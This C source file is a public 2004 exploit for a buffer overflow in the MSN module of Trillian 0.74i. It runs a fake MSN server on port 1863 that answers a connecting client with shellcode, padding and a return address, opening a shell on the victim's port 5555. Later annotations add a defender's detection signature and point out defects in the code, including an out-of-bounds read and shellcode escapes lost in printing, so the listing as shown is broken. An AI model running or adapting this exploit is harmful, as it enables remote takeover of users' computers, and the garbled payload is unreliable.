/*
Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
created by Komrade - unsecure altervista org
Written for Windows 2000 / Windows XP.
Tested on Windows XP Professional sp0.
This exploit spawns a shell on port 5555; you only have to execute the
program and connect to port 5555.
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>
/*
 * Entry point (argc/argv are unused).
 *
 * Behaviour visible in this listing: starts Winsock, opens a TCP listener
 * on port 1863 (the port an MSN client connects to), accepts a single
 * connection, reads whatever the peer sends into `mess`, then overwrites
 * `mess` with `shellcode` padded with 'x' up to index 4089, three bytes
 * the author labels as an overwritten return address, and a trailer, and
 * sends that single oversized line back to the client.
 *
 * Defender's view: the trigger is one abnormally long reply (~4 KiB, no
 * protocol keyword) from a host answering on 1863; that is a usable
 * network-detection signature, and the mitigation is a patched client
 * build (nothing on this page names the fixed version).
 *
 * Defects present in the code as written (left as-is):
 *  - send() uses strlen(mess): after the fill loop no NUL is written
 *    inside mess[0..4095], so strlen() reads past the end of the buffer
 *    (undefined behaviour).
 *  - `client <= 0`: SOCKET is unsigned; accept() reports failure as
 *    INVALID_SOCKET, which this comparison does not catch.
 *  - WSAStartup(), socket(), bind() and listen() results are unchecked.
 *  - exit() is called without <stdlib.h>; whether it is in scope depends
 *    on what <windows.h> pulls in on the author's toolchain.
 *  - The string literals as printed contain no escape sequences (`xEB`,
 *    `rn`), so the listing does not reproduce the original bytes.
 */
int main(int argc,char **argv){
/* payload as printed on the page; see the header comment on escapes */
char shellcode[] =
"xEBx10x5Ax4Ax33xC9x66xB9x66x01x80x34x0Ax99xE2xFAxEB"
"x05xE8xEBxFFxFFxFFx70x99x98x99x99xC3xFDx12xD8xA9x12"
"xD9x95x12xE9x85x34x12xD9x91x12x41x12xEAxA5x9Ax6Ax12"
"xEFxE1x9Ax6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8"
"x12xA6x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5E"
"x9DxDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58x12"
"x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0x71xE5"
"x99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41xF3x9DxC0"
"x71xF0x99x99x99xC9xC9xC9xC9xF3x98xF3x9Bx66xCEx69x12"
"x41x5Ex9Ex9Bx99x8Cx2AxAAx59x10xDEx9DxF3x89xCExCAx66"
"xCEx6DxF3x98xCAx66xCEx61xC9xC9xCAx66xCEx65x1Ax75xDD"
"x12x6DxAAx42xF3x89xC0x10x85x17x7Bx62x10xDFxA1x10xDF"
"xA5x10xDFxD9x5ExDFxB5x98x98x99x99x14xDEx89xC9xCFxCA"
"xCAxCAxF3x98xCAxCAx5ExDExA5xFAxF4xFDx99x14xDExA5xC9"
"xCAx66xCEx7DxC9x66xCEx71xAAx59x35x1Cx59xECx60xC8xCB"
"xCFxCAx66x4BxC3xC0x32x7Bx77xAAx59x5Ax71x62x67x66x66"
"xDExFCxEDxC9xEBxF6xFAxD8xFDxFDxEBxFCxEAxEAx99xDAxEB"
"xFCxF8xEDxFCxC9xEBxF6xFAxFCxEAxEAxD8x99xDCxE1xF0xED"
"xC9xEBxF6xFAxFCxEAxEAx99xD5xF6xF8xFDxD5xF0xFBxEBxF8"
"xEBxE0xD8x99xEExEAxABxC6xAAxABx99xCExCAxD8xCAxF6xFA"
"xF2xFCxEDxD8x99xFBxF0xF7xFDx99xF5xF0xEAxEDxFCxF7x99"
"xF8xFAxFAxFCxE9xEDx99";
SOCKET sock, client;           /* listening socket and the accepted peer */
struct sockaddr_in sock_addr, client_addr;
WSADATA data;
WORD p;                        /* requested Winsock version */
char mess[4096];               /* receive buffer, then the outgoing line */
int lun, n, i;                 /* lun: address length for accept(); n: I/O result */
p = MAKEWORD(2, 0);
WSAStartup(p, &data);          /* result unchecked */
printf("------------------------------------------------------------------------rn");
printf("- Cerulean Studios Trillian 0.74i MSN module Buffer Overflow exploit -rn");
printf("- for Windows 2000 / Windows XP -rn");
printf("- -rn");
printf("- created by Komrade - http://unsecure.altervista.org -rn");
printf("------------------------------------------------------------------------rn");
sock = socket(PF_INET,SOCK_STREAM, 0);   /* result unchecked */
sock_addr.sin_family = PF_INET;
sock_addr.sin_port = htons(1863);        /* impersonates the MSN server port */
sock_addr.sin_addr.s_addr = INADDR_ANY;  /* listens on every local interface */
bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));   /* unchecked */
listen(sock,1);                          /* unchecked; backlog of one */
lun = sizeof (struct sockaddr);
printf("rnWaiting for a connection...rn");
client = accept(sock, (struct sockaddr*)&client_addr, &lun);
/* SOCKET is unsigned: a failed accept() returns INVALID_SOCKET, not <= 0 */
if (client <= 0){
printf("Unable to wait for connectionsrn");
exit(-1);
}
/* the client's opening line is read and then discarded (overwritten below) */
n=recv(client, mess, sizeof(mess),0);
if (n < 0){
printf("Error receving connectionsrn");
exit(-1);
}
printf("Received a connection request from a client.rn");
strcpy(mess, shellcode);                 /* copies the NUL too; it is overwritten by the fill loop */
for(i=strlen(shellcode); i < 4090; i++)
mess[i]='x';                             /* pad up to index 4089; i == 4090 on exit */
mess[i]=0x33; /* three bytes the author labels as the overwritten return address */
mess[i+1]=0x12; /*return address of a "call ebx" command in trillian.exe*/
mess[i+2]=0x40; /**/
mess[i+3]='r';
mess[i+4]='n';
mess[i+5]=' ';                           /* last byte of mess (index 4095); no terminator follows */
/* strlen(mess) scans beyond mess[4095] because no NUL was written: UB */
n = send(client, mess, strlen(mess),0);
if (n > 0){
printf("Exploit sent succesfully.rn");
printf("Now connect to port 5555.rn");
}
else
printf("Error sending the exploitrn");
closesocket (client);
closesocket(sock);
WSACleanup();
return 0;
}
// milw0rm.com [2004-09-08]